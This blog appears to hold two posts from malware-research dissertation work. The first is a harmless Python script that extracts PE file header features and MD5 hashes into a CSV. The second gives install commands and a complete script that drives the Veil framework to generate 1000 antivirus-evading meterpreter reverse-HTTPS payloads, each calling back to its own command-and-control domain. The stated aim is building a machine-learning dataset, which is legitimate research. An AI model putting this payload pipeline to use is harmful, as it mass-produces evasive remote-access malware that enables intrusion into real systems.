Wednesday, August 29, 2018

Feature extraction of PEFiles using Python

This post serves as a reminder on how to perform feature extraction of PE binaries using Python.
The code uses the 2012 Adobe's Malware Classifier as a reference and modified accordingly for my own purpose. 
The code uses PEFile python module to read and work with PE files. 
 
My Purpose:
a) Extraction of PE file Header and Section information.
b) Compute MD5 sum of binary.
c) Save the information in a CSV file.

First import the required python library. 
import os
import pefile
import pandas as pd
import hashlib

Next define the function for computing md5 value given the filename. *Filename requires full path if binary is located in a separate directory from the python script.
def md5sum(filename, blocksize=65536):
    hash = hashlib.md5()
    with open(filename, "rb") as f:
        for block in iter(lambda: f.read(blocksize), b""):
            hash.update(block)
    return hash.hexdigest()

Next define a python class to represent the PE binary file.
class PEFile:
    #representation of PE file
    def __init__(self, filename):
        with open(filename, "rb") as file_content:
            self.pe= pefile.PE(data=file_content.read(), fast_load=True)
        self.filename = filename
        self.DebugSize = self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[6].Size
        self.DebugRVA = self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[6].VirtualAddress
        self.ImageVersion = self.pe.OPTIONAL_HEADER.MajorImageVersion
        self.OSVersion = self.pe.OPTIONAL_HEADER.MajorOperatingSystemVersion
        self.ExportRVA = self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[0].VirtualAddress
        self.ExportSize = self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[0].Size
        self.IATRVA = self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[12].VirtualAddress
        self.ResSize = self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[2].Size
        self.LinkerVersion = self.pe.OPTIONAL_HEADER.MajorLinkerVersion
        self.VirtualSize2 = self.pe.sections[1].Misc_VirtualSize
        self.NumberOfSections = self.pe.FILE_HEADER.NumberOfSections
        self.StackReserveSize = self.pe.OPTIONAL_HEADER.SizeOfStackReserve
        self.Dll = self.pe.OPTIONAL_HEADER.DllCharacteristics
        self.pe.parse_data_directories()
        countf = 0
        countm = 0
        for entry in self.pe.DIRECTORY_ENTRY_IMPORT:
          #print (entry.dll)
            countf += 1
            for imp in entry.imports:
                #print ('\t', hex(imp.address), imp.name)
                countm += 1
        self.ImportFunctionCount = countf
        self.ImportFunctionMethodCount = countm
        file_content.close()
        self.md5hash = md5sum(filename)
        print ("Loaded PE File")
        
    def Construct(self):
        sample = {}
        for feature, value in self.__dict__.items():
            if(feature != "pe"):
                sample[feature] = value
        print ("Construct completed")
        return sample

Method to iterate through a directory for PE Files. PE Header and Section information are extracted and stored in a python dictionary and returned.
def pe2vec():
    #dataset is a python dictionary which store the key value mapping
    dataset = {}
    
    #Recursively search for files within a specified directory and its subdir
    directory = "C:\\Users\\chia0\\Downloads\\dissertation\\malware\\malware\\metasploit_samples\\temp"
    for subdir, dirs, files in os.walk(directory):
        for f in files:
            file_path = os.path.join(subdir, f)
            try:
                #read PE file using PEFILE module
                pe = PEFile(file_path)        
                # pe.construct returns a dictionary with features as key and feature value as value
                dataset[str(f)] = pe.Construct()
            except Exception as e:
                print (e)
    return dataset

Method to save python dictionary returned by pe2vec() function to a CSV file.
def saveToCSV(dataset):
    df = pd.DataFrame(dataset)
    infected = df.transpose()  
    infected.to_csv('C:\\Users\\chia0\\Downloads\\dissertation\\malware\\dataset_m641.csv',sep=',', encoding='utf-8')
    


Full Code is shown below:
import os
import pefile
import pandas as pd
import hashlib

def md5sum(filename, blocksize=65536):
    hash = hashlib.md5()
    with open(filename, "rb") as f:
        for block in iter(lambda: f.read(blocksize), b""):
            hash.update(block)
    return hash.hexdigest()

class PEFile:
    #representation of PE file
    def __init__(self, filename):
        with open(filename, "rb") as file_content:
            self.pe= pefile.PE(data=file_content.read(), fast_load=True)
        self.filename = filename
        self.DebugSize = self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[6].Size
        self.DebugRVA = self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[6].VirtualAddress
        self.ImageVersion = self.pe.OPTIONAL_HEADER.MajorImageVersion
        self.OSVersion = self.pe.OPTIONAL_HEADER.MajorOperatingSystemVersion
        self.ExportRVA = self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[0].VirtualAddress
        self.ExportSize = self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[0].Size
        self.IATRVA = self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[12].VirtualAddress
        self.ResSize = self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[2].Size
        self.LinkerVersion = self.pe.OPTIONAL_HEADER.MajorLinkerVersion
        self.VirtualSize2 = self.pe.sections[1].Misc_VirtualSize
        self.NumberOfSections = self.pe.FILE_HEADER.NumberOfSections
        self.StackReserveSize = self.pe.OPTIONAL_HEADER.SizeOfStackReserve
        self.Dll = self.pe.OPTIONAL_HEADER.DllCharacteristics
        self.pe.parse_data_directories()
        countf = 0
        countm = 0
        for entry in self.pe.DIRECTORY_ENTRY_IMPORT:
          #print (entry.dll)
            countf += 1
            for imp in entry.imports:
                #print ('\t', hex(imp.address), imp.name)
                countm += 1
        self.ImportFunctionCount = countf
        self.ImportFunctionMethodCount = countm
        file_content.close()
        self.md5hash = md5sum(filename)
        print ("Loaded PE File")
        
    def Construct(self):
        sample = {}
        for feature, value in self.__dict__.items():
            if(feature != "pe"):
                sample[feature] = value
        print ("Construct completed")
        return sample
    
def pe2vec():
    #dataset is a python dictionary which store the key value mapping
    dataset = {}
    
    #Recursively search for files within a specified directory and its subdir
    directory = "C:\\Users\\chia0\\Downloads\\dissertation\\malware\\malware\\metasploit_samples\\temp"
    for subdir, dirs, files in os.walk(directory):
        for f in files:
            file_path = os.path.join(subdir, f)
            try:
                #read PE file using PEFILE module
                pe = PEFile(file_path)        
                # pe.construct returns a dictionary with features as key and feature value as value
                dataset[str(f)] = pe.Construct()
            except Exception as e:
                print (e)
    return dataset
    
def saveToCSV(dataset):
    df = pd.DataFrame(dataset)
    infected = df.transpose()  
    infected.to_csv('C:\\Users\\chia0\\Downloads\\dissertation\\malware\\dataset_m641.csv',sep=',', encoding='utf-8')
    
pedata = pe2vec()
saveToCSV(pedata)





Saturday, August 11, 2018

Automating generation of VEIL payloads

This post serves as a journal of the technique used for automating generation of VEIL payloads. 
https://github.com/Veil-Framework

Objective: Generation of 1000 VEIL payloads each with a unique C&C domain name and binary name.

Purpose: Creation of malware dataset for Machine Learning

Background: VEIL framework in itself is a payload generation framework designed for evasion of Anti-Virus. 

Overview:
1) On a Kali Linux VM
2) Install VEIL framework

apt update
apt -y install veil
/usr/share/veil/config/setup.sh --force --silent

3) Open gedit and copy the below python script. Save the script to veil directory (/usr/share/veil)

import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import socket
from socket import error as socket_error
import errno

import subprocess
from subprocess import Popen

#read domain names to use
print ("Reading domain names from csv file:")
df = pd.read_csv('./website.csv')
df.info()
df.describe()
print ("Loaded domain name file")
print("")

correctmsg = "Metasploit Resource file written to:"
errmsg = "bignum too big to convert"

startfrom = 0

for index, row in df.iterrows():
 if startfrom > index:
  print ("skip: "+str(row[1]))
  continue

 attempt = 1
 #uncomment the 2 lines below to use the resolved ip address instead 
 try:
  addr = socket.gethostbyname(row[0])
  print(addr)
 except socket_error as serr:  
  if serr.errno == -2:
   print ("Domain: "+row[0]+" is unresolvable, using default IP value instead.")
   row[0] = "127.0.0.1"

 command = "-t Evasion -p cs/meterpreter/rev_https.py --ip " + row[0] + " --port 443" 
 binaryname = str(row[1])+".exe"
 print (command)
 
 #set i to any positive number to start the loop  
 i = 9999
 x = -1
 while x == -1:
  proc = subprocess.Popen(['./Veil.py','-t','Evasion','-p','cs/meterpreter/rev_https.py','--ip',str(row[0]),'--port','443','-o',str(row[1])], stdout=subprocess.PIPE,stderr=subprocess.PIPE)
  tmp = proc.communicate()[0]
  x = tmp.find(correctmsg)
  #-1 represent errmsg is not found thus implying that crafting is successful
  i = tmp.find(errmsg)
  #print ("i value:" + str(i))

  if i != -1 :
   print ("retrying error crafting payload...: attempting " + str(attempt) + " times")
   attempt = attempt + 1 
  if x == -1 :
   print ("error: " + tmp)
   attempt = attempt + 1 

 print ("Command: " + command + " is successful.")
 print ("Saving as :" + binaryname)
 #subprocess.call('mv ./windows-meterpreter-staged-reverse-https-443.exe ./' + binaryname, shell=True)
 print ("Saved")
 print ("")
 

4) Create a csv file using excel with the following format and save it as website.csv: 


5) Execute the Python script 

cd /usr/share/veil
python veil_malware_generation_script.py

6) Generated malware are saved at /var/lib/veil/output/compiled

7) VEIL is really fast, about 20 minutes to generate the 1000 malware samples.